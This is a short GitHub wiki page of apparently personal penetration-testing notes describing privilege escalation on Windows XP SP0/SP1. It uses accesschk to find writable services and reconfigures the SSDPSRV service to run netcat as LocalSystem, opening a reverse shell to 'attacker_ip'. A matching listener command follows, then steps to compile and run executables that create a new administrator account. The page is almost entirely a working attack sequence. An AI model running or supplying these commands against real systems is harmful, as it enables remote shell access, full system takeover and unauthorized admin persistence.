-
Notifications
You must be signed in to change notification settings - Fork 14
EoP for WinXP SP0, SP1
lethanhtung01011980 edited this page Oct 9, 2019
·
6 revisions
- Use accesschk to check services with RW access
- Either upnphost or SSDPSRV
- cd C:\Inetpub\wwwroot\winxp
- accesschk users -cw * /accepteula
- accesschk.exe -uwcqv "Authenticated Users" * /accepteula
- accesschk users -cuwcqv * /accepteula
sc config SSDPSRV binpath= "C:\Inetpub\wwwroot\nc.exe -nv attacker_ip 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config SSDPSRV depend= ""
sc config SSDPSRV obj= ".\LocalSystem" password= ""
sc qc SSDPSRV
sc config SSDPSRV start= auto
net start SSDPSRV
- nc -nlvp 9988
- Create c files to create new admin user
- Convert c files to exe files
- Run C:\Inetpub\wwwroot\addnewuser.exe
- Run C:\Inetpub\wwwroot\addusertoAdmin.exe